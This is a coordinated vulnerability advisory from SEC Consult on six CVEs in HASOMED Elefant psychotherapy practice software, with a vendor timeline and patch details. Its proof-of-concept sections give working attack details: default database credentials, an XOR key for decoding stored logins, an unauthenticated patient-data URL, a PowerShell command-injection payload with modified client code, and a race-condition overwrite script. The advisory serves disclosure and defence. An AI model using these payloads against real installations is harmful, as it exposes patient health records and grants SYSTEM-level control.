SEC Consult Vulnerability Lab Security Advisory < 20241107-0 > ======================================================================= title: Multiple Vulnerabilities product: HASOMED Elefant and Elefant Software Updater vulnerable version: <24.04.00, Elefant Software Updater <1.4.2.1811 fixed version: 24.04.00, Elefant Software Updater 1.4.2.1811 CVE number: CVE-2024-50588, CVE-2024-50589, CVE-2024-50590, CVE-2024-50591, CVE-2024-50592, CVE-2024-50593 impact: Critical homepage: https://hasomed.de/produkte/elefant/ found: 2024-04-15 by: Tobias Niemann (Office Bochum) Daniel Hirschberger (Office Bochum) Florian Stuhlmann (Office Bochum) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- (Translated) "Elefant is the KBV-certified practice software from HASOMED, specializing in the needs of psychological psychotherapists, child and adolescent psychotherapists and medical psychotherapists. The software is ideal for individual and group practices, private accountants, medical care centers and training institutes in the fields of behavioral therapy, psychoanalysis, depth psychology -based psychotherapy and systemic therapy." Source: https://hasomed.de/produkte/elefant/ Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Unprotected Exposed Firebird Database (CVE-2024-50588) An unauthenticated attacker with access to the local network of the medical office can use known default credentials to gain remote DBA access to the Elefant Firebird database. The data in the database includes patient data and login credentials among other sensitive data. In addition, this enables an attacker to create and overwrite arbitrary files on the server filesystem with the rights of the Firebird database ("NT AUTHORITY\SYSTEM"). 2) Unprotected FHIR API (CVE-2024-50589) An unauthenticated attacker with access to the local network of the medical office can query an unprotected Fast Healthcare Interoperability Resources (FHIR) API to get access to sensitive electronic health records (EHR). 3) Local Privilege Escalation via Weak Service Binary Permissions (CVE-2024-50590) An attacker with local access the to medical office computer can escalate his Windows user privileges to "NT AUTHORITY\SYSTEM" by overwriting one of two Elefant service binaries with weak permissions. 4) Local Privilege Escalation via Command Injection (CVE-2024-50591) An attacker with local access the to medical office computer can escalate his Windows user privileges to "NT AUTHORITY\SYSTEM" by exploiting a command injection vulnerability in the Elefant Update Service. The command injection can be exploited by communicating with the Elefant Update Service which is running as "SYSTEM" via Windows Named Pipes. 5) Local Privilege Escalation via Race Condition (CVE-2024-50592) An attacker with local access the to medical office computer can escalate his Windows user privileges to "NT AUTHORITY\SYSTEM" by exploiting a race condition in the Elefant Update Service during the repair or update process. 6) Hardcoded Service Password (CVE-2024-50593) An attacker with local access to the medical office computer can access restricted functions of the Elefant Service tool by using a hardcoded "Hotline" password. Proof of concept: ----------------- 1) Unprotected Exposed Firebird Database (CVE-2024-50588) Elefant uses a Firebird DB to store data. The Firebird server listens on all interfaces on port 3050: <unprotected_db_1.png> An attacker can connect directly to the database as DBA if he can reach port 3050 of the Elefant server using the known Firebird default credentials "SYSDBA:masterkey" and specifying the Elefant database path "C:\Elefant1\ELEFANT.gdb". <unprotected_db_2.png> The database contains all Elefant data including patient data and the obfuscated Elefant login data: <unprotected_db_3.png> To obtain the plain login credentials each byte must be xored with 0x1b. In addition an attacker can create and overwrite arbitrary files on the server filesystem with the rights of the database ("NT AUTHORITY\SYSTEM") via Firebird delta files. Depending on other running software (i.e. MS IIS) RCE can be achieved this way by uploading a webshell. The weak default credentials are hardcoded into Elefant and Elefant Service. 2) Unprotected FHIR API (CVE-2024-50589) While the Elefant client is running it listens on port 9090 on all interfaces. <unprotected_api_1.png> An unauthenticated FHIR API is exposed on this port. An attacker with access to port 9090 can query the API for patient and physician data among other data. The API can be queried via plain HTTP. All patient data can for example be queried by visiting the following URL: http://XXX.XXX.XXX.XXX:9090/Patient The API responds with the patient data: ------------------------------------------------------------------------------ <?xml version="1.0"?> <Bundle xmlns="http://hl7.org/fhir";> [...] <type value="searchset"/> <timestamp value="2024-05-08T20:38:26.859+02:00"/> <total value="4"/> [...] <Patient> <id value="patient.3"/> <meta> <versionId value="1"/> <lastUpdated value="2024-05-31T14:42:39.685+02:00"/> <profile value="https://fhir.kbv.de/StructureDefinition/KBV_PR_VoS_Patient|2.1.0"/> </meta> <identifier> <type> <coding> <system value="http://terminology.hl7.org/CodeSystem/v2-0203"/> <code value="MR"/> </coding> </type> <system value="http://hasomed.de/Elefant/Patient"/> <value value="3"/> </identifier> <identifier> <use value="official"/> <type> <coding> <system value="http://fhir.de/CodeSystem/identifier-type-de-basis"/> <code value="PKV"/> </coding> </type> <system value="http://fhir.de/sid/pkv/kvid-10"/> <value value="aaaaa"/> </identifier> <name> <use value="official"/> <text value="Dr. POC Vorname POC Nachname"/> <family value="POC Nachname"> <extension url="http://hl7.org/fhir/StructureDefinition/humanname-own-name";> <valueString value="POC Nachname"/> </extension> </family> <given value="POC Vorname"/> <prefix value="Dr."> <extension url="http://hl7.org/fhir/StructureDefinition/iso21090-EN-qualifier";> <valueCode value="AC"/> </extension> </prefix> </name> <gender value="female"/> <birthDate value="2018-11-07"/> <address> <type value="both"/> <line value="Teststr. 1"> <extension url="http://hl7.org/fhir/StructureDefinition/iso21090-ADXP-streetName";> <valueString value="Teststr."/> </extension> <extension url="http://hl7.org/fhir/StructureDefinition/iso21090-ADXP-houseNumber";> <valueString value="1"/> </extension> </line> <city value="Bochum"/> <postalCode value="44801"/> <country value="D"/> </address> </Patient> [...] ------------------------------------------------------------------------------ Similarly all practitioner information is available at: http://XXX.XXX.XXX.XXX:9090/Practitioner/ 3) Local Privilege Escalation via Weak Service Binary Permissions (CVE-2024-50590) The default installation directory of Elefant is "C:\Elefant1" which is writable for all users. In addition, the Elefant installer registers two Firebird database services which are running as "NT AUTHORITY\SYSTEM". <service_binary_1.png> Both service binaries are user writable. This means that a local attacker can rename one of the service binaries, replace the service executable with a new executable, and then restart the system. Once the system has rebooted, the new service binary is executed as "NT AUTHORITY\SYSTEM". 4) Local Privilege Escalation via Command Injection (CVE-2024-50591) The Elefant Software Updater (ESU) consists of two components. An ESU service which runs as "NT AUTHORITY\SYSTEM" and an ESU tray client which communicates with the service to update or repair the installation and is running with user permissions. The communication is implemented using named pipes. A crafted message of type "MessageType.SupportServiceInfos" can be sent to the local ESU service to inject commands, which are then executed as "NT AUTHORITY\SYSTEM". The following part of the service is vulnerable against command injection, because the input is passed on without filtering: <command_injection_4.png> The input is first split at ';', is then used to create a directory, and finally reaches the sink at line 30. Because the input is split at ';' and the creation of the directory must not fail before reaching the sink, only '&' can be used to inject commands here, because Windows does not allow the characters '\/:*?"<>|' in directory or filenames. The following payload avoids the forbidden characters, ';' and dynamically constructs the path of the target script (C:\SEC\exec.ps1). ------------------------------------------------------------------------------ "& powershell.exe -NoExit -ep bypass powershell (Join-Path (Join-Path (Get-PSDrive c).root SEC)exec.ps1) #". ------------------------------------------------------------------------------ For this proof of concept, the ESU tray client "Info" function was modified to inject commands into the ESU service. The payload must be injected into the first parameter of "CollectServiceInfos" to successfully reach the sink in the ESU service after being sent via a named pipe: ------------------------------------------------------------------------------ private void OnInfo(object sender, EventArgs e) { string text = "C:\\SEC\\exec.ps1"; TrayUtils.ShowMessageBox(new MessageBoxData { Message = "MOD: Put PS Script at " + text, Caption = "Info", ButtonType = MessageBoxButtons.OK, IconType = MessageBoxIcon.Asterisk }); this.m_TrayManager.CollectServiceInfos("& powershell.exe -NoExit -ep bypass powershell (Join-Path (Join-Path (Get-PSDrive c).root SEC)exec.ps1) #", "dummy.zip"); } ------------------------------------------------------------------------------ In this proof of concept the client injects the payload and the ESU service executes the powershell script at the user writable location C:\SEC\exec.ps1. The content of the script is displayed below: ------------------------------------------------------------------------------ whoami > C:\secwashere ------------------------------------------------------------------------------ <command_injection_1.png> <command_injection_2.png> After the OK button is pressed, the command is injected and executed as "NT AUTHORITY\SYSTEM". <command_injection_3.png> 5) Local Privilege Escalation via Race Condition (CVE-2024-50592) Another way to escalate local privileges is to use the Elefant Software Updater "repair" function. When using the repair function, the service queries the server for a list of files and their hashes. In addition, instructions to execute binaries to finalize the repair process are included: ------------------------------------------------------------------------------ POST /eup/release/prod/backend/api/ReadApplicationVersion HTTP/2 Host: eup.hasomed.de Accept: application/json Apikey: fb[...] Content-Type: application/json; charset=utf-8 Content-Length: 242 {"programName":"elefant" [...] ------------------------------------------------------------------------------ The server responds with: ------------------------------------------------------------------------------ HTTP/2 200 OK [...] "hash":"","fileSize":0,"type":"execute","filePath":"PostESUUpdate.exe", "parameters":"","hint":"Abschließende Schritte nach der Installation des Elefant-Updates durch den ESU"},{"hash":"","fileSize":0,"type":"execute","filePath":"Support\\Update_OpenJava.exe" ,"parameters":"/verysilent","hint":"Aktualisierung der OpenJava-Instanz"}]} ------------------------------------------------------------------------------ The executables are executed as "NT AUTHORITY\SYSTEM" after they are copied over to the user writable installation folder (C:\Elefant1). This means that a user can overwrite either "PostESUUpdate.exe" or "Update_OpenJava.exe" in the time frame after the copy and before the execution of the final repair step. The overwritten executable is then executed as "NT AUTHORITY\SYSTEM". The following steps can be performed to reliably execute the local privilege escalation using PostESUUpdate.exe: 1. Delete PostESUUpdate.exe in C:\Elefant1 before starting the repair function. 2. Start repair function in ESU 3. Continuously check if PostESUUpdate.exe has been copied over to C:\Elefant1 yet 4. Immediately overwrite the executable and wait for the execution as "NT AUTHORITY\SYSTEM" The following powershell script can be used to perform steps 3 and 4: ------------------------------------------------------------------------------ // delete PostESUUpdate.exe before starting the update/repair While($true) { If(Test-Path -path "PostESUUpdate.exe" -PathType Leaf){ Copy-Item -Force -Path "exec.exe" -Destination "PostESUUpdate.exe" } } ------------------------------------------------------------------------------ 6) Hardcoded Service Password (CVE-2024-50593) To use certain restricted functions in the Elefant Service Software it is required to enter a hotline password. <hardcoded_service_1.png> This password is hardcoded into the Elefant Service binary, which is shipped with the software: <hardcoded_service_2.png> Vulnerable / tested versions: ----------------------------- The following version has been tested which was the latest version available at the time of the test: * Elefant 24.02.02 * Elefant Software Updater 1.2.0.33679 * Elefant Service 05.02.00 Vendor contact timeline: ------------------------ 2024-07-01: Contacting vendor through security () hasomed de. 2024-07-04: First vendor response. Security contact has time off and will reply on 07-15. 2024-07-12: Security contact is back and requests the advisory. 2024-07-15: Sending advisory to vendor contact. 2024-07-18: Security contact informs us that patches for part of the issues are planned for CW32; due to vacation and regulatory issues the other issues can only be fixed after CW42, therefore they request for an extension to CW42 for the deadline; We extend the deadline to CW42; 2024-07-29: Security contact informs us that the first three fixes have been implemented in Version 24.03.03. According to the changelog, the update contains fixes for findings 1 and 6. 2024-09-04: Security contact informs us that all development is progressing as planned and the new release will be ready in CW 42. 2024-10-16: Security contact sends new release notes for version 24.04.00. According to the changelog and security contact, the update contains fixes for finding 2 and 3. 2024-10-23: Security contact informs us that the update 1.4.2.1811 of the Elefant Software Updater contains fixes for findings 4 and 5, and that adjustments for the FHIR API were made in version 24.04.00. 2024-10-28: Sending vendor latest advisory draft, informing about release on 31st October. 2024-10-30: Vendor thanks for CVE, no further feedback except first updates for the Software Updater are already available since 2024-08-21. 2024-11-05: Informing vendor about delay, postponed to 7th November. 2024-11-07: Coordinated release of advisory. Solution: --------- The vendor provides a patched version 24.04.00 (or higher) which can be downloaded from https://hasomed.de/produkte/elefant/ or via the Elefant Software Updater. This patched version does also include fixes for the Elefant Software Updater which were shipped in version 1.4.2.1811 of the updater. Workaround: ----------- While workarounds such as modifying the Elefant windows firewall rules and manually adjusting file permissions in the installation folder are feasible workarounds for some of the vulnerabilities, it is recommended to install the patches provided by the vendor. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Tobias Niemann, Daniel Hirschberger, Florian Stuhlmann / @2024
Attachment:
smime.p7s
Description: S/MIME Cryptographic Signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/